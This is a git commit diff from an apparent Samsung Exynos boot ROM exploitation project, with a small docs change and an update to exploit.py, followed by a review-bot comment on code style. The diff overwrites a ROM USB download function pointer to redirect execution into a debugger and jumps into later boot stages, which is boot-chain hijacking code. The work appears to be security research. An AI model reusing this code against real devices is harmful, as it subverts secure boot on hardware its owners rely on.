Minor docs update and exploit.py update

This commit is contained in:
Jonathan Herrewijnen 2024-09-16 10:52:44 +02:00
parent d9d9ae332a
commit 201e8485e8
2 changed files with 24 additions and 2 deletions


@ -154,8 +154,10 @@ We searched for quite some time for a space which was both writeable and executa
Python part
^^^^^^^^^^^
Python code to setup the debugger.
.. code-block:: python
# Setup initial debugger
self.setup_guppy_debugger()
self.cd.arch_dbg.state.auto_sync = False


@ -774,8 +774,8 @@ class ExynosDevice():
# Restore bootflow
# self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
# Restore this to
self.cd.restore_stack_and_jump(hijacked_fun)
# Disable this to keep access to the debugger after senindg the next stage
# self.cd.restore_stack_and_jump(hijacked_fun)
# ==== Stage 5 ====
stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
@ -789,6 +789,26 @@ class ExynosDevice():
# assert len(stage4) == stage4_len, "Invalid stage4 length"
self.send_normal_stage(stage4)
# TRYOUT PATCHING BL33
# BL1 is loaded, now authenticate and patch it
auth_bl1(DEBUGGER_ADDR)
self.usb_write(b"FLSH") # Flush cache (Frederic does this..)
# Hijack ROM download function
hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4))
self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31
self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))
# Jump into BL1 (sboot.bin.1.bin)
JUMP_BL33 = 0x8f000000
def jump_bl33(lr):
self.cd.arch_dbg.state.LR = lr
self.cd.restore_stack_and_jump(JUMP_BL33)
# And jump into BL1 to execute it
jump_bl33(DEBUGGER_ADDR)
time.sleep(2)
pass
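Review bot: The comments on the new lines contradict the names they annotate: `# Jump into BL1 (sboot.bin.1.bin)` and `# And jump into BL1 to execute it` sit directly above `JUMP_BL33 = 0x8f000000` and `jump_bl33(DEBUGGER_ADDR)`, so a reader cannot tell whether BL1 or BL33 is meant, and the comments should name the same stage as the code, e.g. `# Set LR to the debugger, then jump to JUMP_BL33`. The constant and the nested `jump_bl33` helper are re-created inside the method body on every call; hoisting `JUMP_BL33` to module level next to `DEBUGGER_ADDR`, and giving `0x020200dc` and `0x02021880` named constants in the same place, would make the addresses reviewable in one spot instead of scattered across the hunk. The trailing `pass` after `time.sleep(2)` is dead and can be dropped. The enclosing method starts before this hunk, and `auth_bl1` is not defined within it, so whether that is a module-level function or a bound method cannot be seen here.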